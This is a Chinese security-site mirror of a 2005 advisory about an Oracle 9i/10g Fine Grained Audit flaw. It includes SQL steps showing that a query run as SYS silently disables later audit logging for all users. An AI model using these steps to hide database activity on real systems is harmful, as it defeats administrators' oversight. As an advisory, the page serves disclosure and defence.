Oracle 9i/10g – Database Fine Grained Audit Logging Failure

Oracle 9i/10g – Database Fine Grained Audit Logging Failure

漏洞ID 1055091 漏洞类型
发布时间 2005-05-05 更新时间 2005-05-05
图片[1]-Oracle 9i/10g – Database Fine Grained Audit Logging Failure-安全小百科CVE编号 N/A
图片[2]-Oracle 9i/10g – Database Fine Grained Audit Logging Failure-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25613
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/13510/info

Oracle 9i/10g Database is prone to a logging failure vulnerability that exists in Fine Grained Audit (FGA) functionality.

Reports indicate that FGA may be disabled inadvertently, without notifying the database administrator. This results in FGA failing to log queries subsequent to the logging failure, this occurs for all database users and may result in a false sense of security. 

The following steps to reproduce are available:

1. Create user and objects and add policy.
connect /as sysdba
grant dba to fga identified by fga;
conn fga/fga
create table emp as select * from scott.emp;
execute dbms_fga.add_policy(object_schema=>'FGA',
object_name=>'EMP',policy_name=>'FGA_POLICY');

2. Run SQL from fga user
conn fga/fga
select count(*) from fga.emp;
select sql_text,to_char(timestamp,'HH24:MI:SS') time
from sys.dba_fga_audit_trail;

--> It will return 1 row.

3. Run SQL from SYS user
conn /as sysdba
select count(*) from fga.emp;
select sql_text,to_char(timestamp,'HH24:MI:SS') time
from sys.dba_fga_audit_trail;

--> It will return 1 row which was obtained by step 2.

A new row was not inserted.

4. Run SQL from fga user again

conn fga/fga
select count(*) from fga.emp;
select sql_text,to_char(timestamp,'HH24:MI:SS') time
from sys.dba_fga_audit_trail;

--> It will return 1 row which was obtained by step 2.

A new row was not inserted again.

相关推荐: NetcPlus SmartServer3 SMTP Buffer Overflow

NetcPlus SmartServer3 SMTP Buffer Overflow 漏洞ID 1104579 漏洞类型 Boundary Condition Error 发布时间 1999-09-13 更新时间 1999-09-13 CVE编号 N/A CN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享